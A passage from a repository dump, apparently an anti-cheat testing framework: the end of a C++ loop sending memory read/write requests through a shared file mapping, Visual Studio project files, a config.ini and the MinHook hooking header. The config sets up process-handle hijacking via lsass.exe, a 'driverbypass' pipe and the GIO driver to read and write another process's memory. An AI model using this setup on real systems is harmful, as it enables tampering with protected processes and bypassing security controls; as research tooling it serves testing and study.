| //PMRequest.address = 0x0000000144BC6000; 97 | //strncpy_s(PMRequest.buffer, "ABCD3", BUFSIZE); 98 | //PMRequest.size = sizeof(PMRequest.buffer); 99 | 100 | PMRequest.handle = CheatHelper::requestHandleNP; 101 | PMRequest.address = 0x0; 102 | SecureZeroMemory(PMRequest.buffer, BUFSIZE-1); 103 | PMRequest.size = 0x0; 104 | 105 | 106 | int i = 1; 107 | while (1) 108 | { 109 | PMRequest.action = i; 110 | 111 | CheatHelper::prepareRequest(PMRequest); 112 | 113 | CheatHelper::checkSpinLockByte(pFileMapMem, LOCK); 114 | 115 | if (!WriteFileMapping()) 116 | { 117 | std::cout << "[-] Failed writing." << std::endl; 118 | } 119 | 120 | 121 | CheatHelper::setSpinLockByte(pFileMapMem, !LOCK); 122 | CheatHelper::checkSpinLockByte(pFileMapMem, LOCK); 123 | 124 | if (!ReadFileMapping()) 125 | { 126 | std::cout << "[-] Failed reading." << std::endl; 127 | } 128 | 129 | if (i == 7) 130 | break; 131 | i++; 132 | } 133 | CloseHandle(hFileMap); 134 | UnmapViewOfFile(pFileMapMem); 135 | } 136 | Sleep(1000000); 137 | } 138 | 139 | // Run program: Ctrl + F5 or Debug > Start Without Debugging menu 140 | // Debug program: F5 or Debug > Start Debugging menu 141 | 142 | // Tips for Getting Started: 143 | // 1. Use the Solution Explorer window to add/manage files 144 | // 2. Use the Team Explorer window to connect to source control 145 | // 3. Use the Output window to see build output and other messages 146 | // 4. Use the Error List window to view errors 147 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 148 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 149 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/StealthHijackingNormalMaster.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {F74258DB-52A4-4B60-8FBE-385091D35DCA} 24 | Win32Proj 25 | StealthHijackingNormalMaster 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 95 | 96 | 97 | Console 98 | true 99 | C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64 100 | 101 | 102 | 103 | 104 | Use 105 | Level3 106 | Disabled 107 | true 108 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 109 | true 110 | pch.h 111 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 112 | 113 | 114 | Console 115 | true 116 | 117 | 118 | 119 | 120 | Use 121 | Level3 122 | MaxSpeed 123 | true 124 | true 125 | true 126 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 127 | true 128 | pch.h 129 | 130 | 131 | Console 132 | true 133 | true 134 | true 135 | 136 | 137 | 138 | 139 | NotUsing 140 | Level3 141 | MaxSpeed 142 | true 143 | true 144 | true 145 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 146 | true 147 | pch.h 148 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 149 | 150 | 151 | Console 152 | true 153 | true 154 | true 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | Create 163 | Create 164 | Create 165 | Create 166 | 167 | 168 | 169 | 170 | 171 | {a080c117-d1db-4671-8217-65496573ba4d} 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/StealthHijackingNormalMaster.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /StealthHijackingNormalMaster/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /config.ini: -------------------------------------------------------------------------------- 1 | [States] 2 | bDelayExecution=0 3 | [Addresses] 4 | RPMAddressHigh=0x1 5 | RPMAddressLow=0x58A60000 6 | RPMAddress=0x0 7 | WPMAddressHigh=0x00000000 8 | WPMAddressLow=0x58A60000 9 | WPMAddress=0x0 10 | ntRVMAddressHigh=0x00000000 11 | ntRVMAddressLow=0x58A60000 12 | ntRVMAddress=0x0 13 | ntWVMAddressHigh=0x00000000 14 | ntWVMAddressLow=0x58A60000 15 | ntWVMAddress=0x0 16 | ZwRVMAddressHigh=0x00000000 17 | ZwRVMAddressLow=0x58A60000 18 | ZwRVMAddress=0x0 19 | ZwWVMAddressHigh=0x00000000 20 | ZwWVMAddressLow=0x58A60000 21 | ZwWVMAddress=0x0 22 | startAddressPhyHigh=0x00000000 23 | startAddressPhyLow=0x58A60000 24 | startAddressPhy=0x0 25 | [Handles] 26 | requestHandleNP=0x15FC 27 | requestHandleFM=0x15FC 28 | requestHandleDrv=0x15FC 29 | [Buffers] 30 | #SIZE MUST BE SIZE+1 31 | RPMBuffer=TTTT1 32 | RPMBufferSize=0x6 33 | WPMBuffer=TTTT2 34 | WPMBufferSize=0x6 35 | ntRVMBuffer=TTTT4 36 | ntRVMBufferSize=0x6 37 | ntWVMBuffer=TTTT5 38 | ntWVMBufferSize=0x6 39 | ZwRVMBuffer=TTTT6 40 | ZwRVMBufferSize=0x6 41 | ZwWVMBuffer=TTTT7 42 | ZwWVMBufferSize=0x6 43 | [Strings] 44 | targetProc=BD64.exe 45 | privotProc=lsass.exe 46 | #Edit in DLL if you changed it here 47 | namedPipeName=\\.\\pipe\\driverbypass 48 | #Edit in DLL if you changed it here 49 | fileMapName=Global\StealthHijacking 50 | driverName=\\.\GIO -------------------------------------------------------------------------------- /resources/MinHook/include/MinHook.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2017 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | #if !(defined _M_IX86) && !(defined _M_X64) && !(defined __i386__) && !(defined __x86_64__) 32 | #error MinHook supports only x86 and x64 systems. 33 | #endif 34 | 35 | #include 36 | 37 | // MinHook Error Codes. 38 | typedef enum MH_STATUS 39 | { 40 | // Unknown error. Should not be returned. 41 | MH_UNKNOWN = -1, 42 | 43 | // Successful. 44 | MH_OK = 0, 45 | 46 | // MinHook is already initialized. 47 | MH_ERROR_ALREADY_INITIALIZED, 48 | 49 | // MinHook is not initialized yet, or already uninitialized. 50 | MH_ERROR_NOT_INITIALIZED, 51 | 52 | // The hook for the specified target function is already created. 53 | MH_ERROR_ALREADY_CREATED, 54 | 55 | // The hook for the specified target function is not created yet. 56 | MH_ERROR_NOT_CREATED, 57 | 58 | // The hook for the specified target function is already enabled. 59 | MH_ERROR_ENABLED, 60 | 61 | // The hook for the specified target function is not enabled yet, or already 62 | // disabled. 63 | MH_ERROR_DISABLED, 64 | 65 | // The specified pointer is invalid. It points the address of non-allocated 66 | // and/or non-executable region. 67 | MH_ERROR_NOT_EXECUTABLE, 68 | 69 | // The specified target function cannot be hooked. 70 | MH_ERROR_UNSUPPORTED_FUNCTION, 71 | 72 | // Failed to allocate memory. 73 | MH_ERROR_MEMORY_ALLOC, 74 | 75 | // Failed to change the memory protection. 76 | MH_ERROR_MEMORY_PROTECT, 77 | 78 | // The specified module is not loaded. 79 | MH_ERROR_MODULE_NOT_FOUND, 80 | 81 | // The specified function is not found. 82 | MH_ERROR_FUNCTION_NOT_FOUND 83 | } 84 | MH_STATUS; 85 | 86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook, 87 | // MH_QueueEnableHook or MH_QueueDisableHook. 88 | #define MH_ALL_HOOKS NULL 89 | 90 | #ifdef __cplusplus 91 | extern "C" { 92 | #endif 93 | 94 | // Initialize the MinHook library. You must call this function EXACTLY ONCE 95 | // at the beginning of your program. 96 | MH_STATUS WINAPI MH_Initialize(VOID); 97 | 98 | // Uninitialize the MinHook library. You must call this function EXACTLY 99 | // ONCE at the end of your program. 100 | MH_STATUS WINAPI MH_Uninitialize(VOID); 101 | 102 | // Creates a Hook for the specified target function, in disabled state. 103 | // Parameters: 104 | // pTarget [in] A pointer to the target function, which will be 105 | // overridden by the detour function. 106 | // pDetour [in] A pointer to the detour function, which will override 107 | // the target function. 108 | // ppOriginal [out] A pointer to the trampoline function, which will be 109 | // used to call the original target function. 110 | // This parameter can be NULL. 111 | MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID *ppOriginal); 112 | 113 | // Creates a Hook for the specified API function, in disabled state. 114 | // Parameters: 115 | // pszModule [in] A pointer to the loaded module name which contains the 116 | // target function. 117 | // pszTarget [in] A pointer to the target function name, which will be 118 | // overridden by the detour function. 119 | // pDetour [in] A pointer to the detour function, which will override 120 | // the target function. 121 | // ppOriginal [out] A pointer to the trampoline function, which will be 122 | // used to call the original target function. 123 | // This parameter can be NULL. 124 | MH_STATUS WINAPI MH_CreateHookApi( 125 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal); 126 | 127 | // Creates a Hook for the specified API function, in disabled state. 128 | // Parameters: 129 | // pszModule [in] A pointer to the loaded module name which contains the 130 | // target function. 131 | // pszTarget [in] A pointer to the target function name, which will be 132 | // overridden by the detour function. 133 | // pDetour [in] A pointer to the detour function, which will override 134 | // the target function. 135 | // ppOriginal [out] A pointer to the trampoline function, which will be 136 | // used to call the original target function. 137 | // This parameter can be NULL. 138 | // ppTarget [out] A pointer to the target function, which will be used 139 | // with other functions. 140 | // This parameter can be NULL. 141 | MH_STATUS WINAPI MH_CreateHookApiEx( 142 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal, LPVOID *ppTarget); 143 | 144 | // Removes an already created hook. 145 | // Parameters: 146 | // pTarget [in] A pointer to the target function. 147 | MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget); 148 | 149 | // Enables an already created hook. 150 | // Parameters: 151 | // pTarget [in] A pointer to the target function. 152 | // If this parameter is MH_ALL_HOOKS, all created hooks are 153 | // enabled in one go. 154 | MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget); 155 | 156 | // Disables an already created hook. 157 | // Parameters: 158 | // pTarget [in] A pointer to the target function. 159 | // If this parameter is MH_ALL_HOOKS, all created hooks are 160 | // disabled in one go. 161 | MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget); 162 | 163 | // Queues to enable an already created hook. 164 | // Parameters: 165 | // pTarget [in] A pointer to the target function. 166 | // If this parameter is MH_ALL_HOOKS, all created hooks are 167 | // queued to be enabled. 168 | MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget); 169 | 170 | // Queues to disable an already created hook. 171 | // Parameters: 172 | // pTarget [in] A pointer to the target function. 173 | // If this parameter is MH_ALL_HOOKS, all created hooks are 174 | // queued to be disabled. 175 | MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget); 176 | 177 | // Applies all queued changes in one go. 178 | MH_STATUS WINAPI MH_ApplyQueued(VOID); 179 | 180 | // Translates the MH_STATUS to its name as a string. 181 | const char * WINAPI MH_StatusToString(MH_STATUS status); 182 | 183 | #ifdef __cplusplus 184 | } 185 | #endif 186 | 187 | -------------------------------------------------------------------------------- /resources/MinHook/lib/libMinHook-x64-v141-mdd.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/niemand-sec/AntiCheat-Testing-Framework/e0c74d7fe99ea62a11adcfcd7dff4cdc50d6b8da/resources/MinHook/lib/libMinHook-x64-v141-mdd.lib --------------------------------------------------------------------------------